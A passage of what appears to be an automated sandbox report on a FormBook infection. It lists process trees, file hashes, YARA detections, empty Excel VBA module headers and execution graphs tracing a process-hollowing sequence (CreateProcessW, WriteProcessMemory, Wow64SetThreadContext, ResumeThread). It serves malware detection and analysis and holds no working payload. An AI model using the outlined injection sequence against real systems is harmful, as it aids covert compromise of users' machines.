                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x830000
                                                  File size:64'704 bytes
                                                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:03:32:53
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe"
                                                  Imagebase:0xf0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:13
                                                  Start time:03:32:55
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\find.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\find.exe"
                                                  Imagebase:0x230000
                                                  File size:13'824 bytes
                                                  MD5 hash:5816034B0B629756163B80838853B730
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:03:33:07
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe"
                                                  Imagebase:0xf0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:16
                                                  Start time:03:33:21
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x3e0000
                                                  File size:517'064 bytes
                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Module: Sheet1

                                                  Declaration

                                                  Attribute VB_Name = "Sheet1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Module: Sheet2

                                                  Declaration

                                                  Attribute VB_Name = "Sheet2"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Module: Sheet3

                                                  Declaration

                                                  Attribute VB_Name = "Sheet3"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Module: ThisWorkbook

                                                  Declaration

                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.448889505.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.448889505.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd

                                                    Execution Graph

                                                    Execution Coverage:9.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:58.7%
                                                    Total number of Nodes:46
                                                    Total number of Limit Nodes:2
                                                    execution_graph 5224 614b38 5225 614b5f 5224->5225 5228 614c88 5225->5228 5229 614c98 5228->5229 5230 614c74 5229->5230 5233 614d50 5229->5233 5249 614d40 5229->5249 5234 614d83 5233->5234 5265 611724 5234->5265 5236 614f4c 5237 611730 Wow64SetThreadContext 5236->5237 5239 61504b 5236->5239 5237->5239 5238 61176c WriteProcessMemory 5243 615374 5238->5243 5239->5238 5240 615613 5241 61176c WriteProcessMemory 5240->5241 5242 615664 5241->5242 5244 611778 Wow64SetThreadContext 5242->5244 5246 615767 5242->5246 5243->5240 5245 61176c WriteProcessMemory 5243->5245 5244->5246 5245->5243 5247 611790 ResumeThread 5246->5247 5248 615819 5247->5248 5248->5229 5250 614d50 5249->5250 5251 611724 CreateProcessW 5250->5251 5252 614f4c 5251->5252 5255 61504b 5252->5255 5280 611730 5252->5280 5269 61176c 5255->5269 5256 615613 5257 61176c WriteProcessMemory 5256->5257 5258 615664 5257->5258 5262 615767 5258->5262 5273 611778 5258->5273 5259 615374 5259->5256 5261 61176c WriteProcessMemory 5259->5261 5261->5259 5277 611790 5262->5277 5266 615928 CreateProcessW 5265->5266 5268 615b1c 5266->5268 5268->5268 5270 615f90 WriteProcessMemory 5269->5270 5272 616070 5270->5272 5272->5259 5274 615c60 Wow64SetThreadContext 5273->5274 5276 615d1c 5274->5276 5276->5262 5278 6160d0 ResumeThread 5277->5278 5279 615819 5278->5279 5279->5229 5281 615c60 Wow64SetThreadContext 5280->5281 5283 615d1c 5281->5283 5283->5255

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextMemoryProcessThreadWow64Write
                                                    • String ID:
                                                    • API String ID: 3696009080-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L4#p$L4#p$L4#p$d=v
                                                    • API String ID: 0-2284860627

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: l;v$l;v
                                                    • API String ID: 0-572271346

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 150 61591c-6159b3 152 6159b5-6159c7 150->152 153 6159ca-6159d8 150->153 152->153 154 6159da-6159ec 153->154 155 6159ef-615a2b 153->155 154->155 156 615a2d-615a3c 155->156 157 615a3f-615b1a CreateProcessW 155->157 156->157 161 615b23-615bec 157->161 162 615b1c-615b22 157->162 171 615c22-615c2d 161->171 172 615bee-615c17 161->172 162->161 175 615c2e 171->175 172->171 175->175
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00615B07
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 177 611724-6159b3 179 6159b5-6159c7 177->179 180 6159ca-6159d8 177->180 179->180 181 6159da-6159ec 180->181 182 6159ef-615a2b 180->182 181->182 183 615a2d-615a3c 182->183 184 615a3f-615b1a CreateProcessW 182->184 183->184 188 615b23-615bec 184->188 189 615b1c-615b22 184->189 198 615c22-615c2d 188->198 199 615bee-615c17 188->199 189->188 202 615c2e 198->202 199->198 202->202
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00615B07
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 204 61176c-615ff7 206 615ff9-61600b 204->206 207 61600e-61606e WriteProcessMemory 204->207 206->207 208 616070-616076 207->208 209 616077-6160b5 207->209 208->209
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0061605E
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 212 615f89-615ff7 213 615ff9-61600b 212->213 214 61600e-61606e WriteProcessMemory 212->214 213->214 215 616070-616076 214->215 216 616077-6160b5 214->216 215->216
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0061605E
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 227 611778-615cbc 229 615cd3-615d1a Wow64SetThreadContext 227->229 230 615cbe-615cd0 227->230 231 615d23-615d5b 229->231 232 615d1c-615d22 229->232 230->229 232->231
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 219 611730-615cbc 221 615cd3-615d1a Wow64SetThreadContext 219->221 222 615cbe-615cd0 219->222 223 615d23-615d5b 221->223 224 615d1c-615d22 221->224 222->221 224->223
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 235 615c59-615cbc 236 615cd3-615d1a Wow64SetThreadContext 235->236 237 615cbe-615cd0 235->237 238 615d23-615d5b 236->238 239 615d1c-615d22 236->239 237->236 239->238
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: ccbb2a62ee981261b16d899a26c640c5e2d71f796302c74c5af50cc8475597fd
                                                    • Instruction ID: 572b9a88901714782f4f763cc9ce4437780728106c1f75cb8c00bac2e73b8302
                                                    • Opcode Fuzzy Hash: ccbb2a62ee981261b16d899a26c640c5e2d71f796302c74c5af50cc8475597fd
                                                    • Instruction Fuzzy Hash: 143179B5D012589FCB10CFA9D984ADEFBF1AB49314F24802AE415B7350D3789A85CF94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 242 6160c8-616156 ResumeThread 244 616158-61615e 242->244 245 61615f-61618d 242->245 244->245
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 00616146
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 9ed35c956cbb13b906f3fe62737c3b1f3132ffa7ed3c457c4e4897bb1949772b
                                                    • Instruction ID: bdcf9345cfa17018ec341ecd7801d6737bc7b9fc97c8bb68e0b3bbfd35800a50
                                                    • Opcode Fuzzy Hash: 9ed35c956cbb13b906f3fe62737c3b1f3132ffa7ed3c457c4e4897bb1949772b
                                                    • Instruction Fuzzy Hash: B221CEB8D002199FCB10CFA9D584ADEFBF0EB49314F24901AE818B7310C374A941CFA4

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 248 611790-616156 ResumeThread 250 616158-61615e 248->250 251 61615f-61618d 248->251 250->251
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 00616146
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 59643b314a5de2aa3a8d4e6b606bad6a0632b0783dda0e5f7f0c6f93bda6b89d
                                                    • Instruction ID: be9f4974af7b442c0ab387341bfb4780deeb6f9bd5a455032fce9c220d48767a
                                                    • Opcode Fuzzy Hash: 59643b314a5de2aa3a8d4e6b606bad6a0632b0783dda0e5f7f0c6f93bda6b89d
                                                    • Instruction Fuzzy Hash: F921A8B8D002189FCB10CFA9D884ADEFBF4EB49314F24906AE819B7310D374A945CFA4

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc050fbd0d07b90c7d43a2134af57a3fb0f03ea3308a7324ee067fe600518277
                                                    • Instruction ID: 67afe028fea3f627d4dbc750a15fc4dc29490367410b56d4bd9878e7ae0bd437
                                                    • Opcode Fuzzy Hash: bc050fbd0d07b90c7d43a2134af57a3fb0f03ea3308a7324ee067fe600518277
                                                    • Instruction Fuzzy Hash: 3E411236704201DBDB294A2894207FAB7A2BF91321BF885BAE8558B391DF7CCD41C761
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 015f2d477f04663795ddfb9ce77b48c862a84f099f7e4a579e3588906b9eb4cb
                                                    • Instruction ID: 26a7b41d1c07b7f10a193d57859f10ee2e5627af212188faad3f00a6857eb87b
                                                    • Opcode Fuzzy Hash: 015f2d477f04663795ddfb9ce77b48c862a84f099f7e4a579e3588906b9eb4cb
                                                    • Instruction Fuzzy Hash: EC31E436744345CFDB29AA64C4503FBB7A1EF95320B28C4AAD4468B2A1DB79CC41C7D1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444097113.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0386a63a63c1afa5d643c478f26a070b19241d22f6a9efdf91dc90bf9f764a4
                                                    • Instruction ID: 564f8ff27b46414340dd157b95b945bd52e7b470785789e5f09a6a177d003f31
                                                    • Opcode Fuzzy Hash: a0386a63a63c1afa5d643c478f26a070b19241d22f6a9efdf91dc90bf9f764a4
                                                    • Instruction Fuzzy Hash: A6018F71504340EAEB248A25EC84BA6BBD8EF91764F2CC51AEC490B282C3799945CAB1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444097113.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 097e36923b0bf308e3040039a23351d239737ddaed0874754bed6dde02b6d3d1
                                                    • Instruction ID: 0c68380bee10ef2e2b19d88649352b0b029caddc59ca4ad838880b7e1d401693
                                                    • Opcode Fuzzy Hash: 097e36923b0bf308e3040039a23351d239737ddaed0874754bed6dde02b6d3d1
                                                    • Instruction Fuzzy Hash: 4DF06271504244AFEB108E15DCC4BA2FBD8EB91724F18C55AED585B282C3799C44CAB1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f566f432ce2330442043f22a57dcf7bc7a5607a222d3e60651f99b6962d2470
                                                    • Instruction ID: 5e6c894f243eb4184e14e7cded7629f1ddf67db1d25634c3df4d920f8c0b2e97
                                                    • Opcode Fuzzy Hash: 8f566f432ce2330442043f22a57dcf7bc7a5607a222d3e60651f99b6962d2470
                                                    • Instruction Fuzzy Hash: 34E0D871B44344CFDF29A66090313EF7751AFA6251FE081E6D45097655DA388805C362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (:v$(:v$(:v$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:v$L:v$L:v
                                                    • API String ID: 0-1236260346
                                                    • Opcode ID: eb5416dccba9972af7b22822b1afd41686b5aaa82e4419b8e6d99c30ee1bbd45
                                                    • Instruction ID: b33a43d4020435f508da76870002fa5e15e0e846cae16c68d220ec62125eb54a
                                                    • Opcode Fuzzy Hash: eb5416dccba9972af7b22822b1afd41686b5aaa82e4419b8e6d99c30ee1bbd45
                                                    • Instruction Fuzzy Hash: 33D12231B00248EFDB259F68D844BEF77A2AF81310F58846AE9059B291DB78DD45CBE1

                                                    Execution Graph

                                                    Execution Coverage:1.4%
                                                    Dynamic/Decrypted Code Coverage:3.9%
                                                    Signature Coverage:6.2%
                                                    Total number of Nodes:129
                                                    Total number of Limit Nodes:9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 287 42c193-42c1cf call 4046d3 call 42d393 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C1CA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 35d480252f95c7a9b98feea759e5853b32f109feb376f3980a4bd7f8c173be69
                                                    • Instruction ID: 7b473c3043948dd1300d2e1bd3a29d072bf4f9e209d7697cbb8ef70274b72ef8
                                                    • Opcode Fuzzy Hash: 35d480252f95c7a9b98feea759e5853b32f109feb376f3980a4bd7f8c173be69
                                                    • Instruction Fuzzy Hash: D9E0DF316002043BD110EB1AEC01FDB775CCFC5710F004429FA0867246D671790086F9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmp
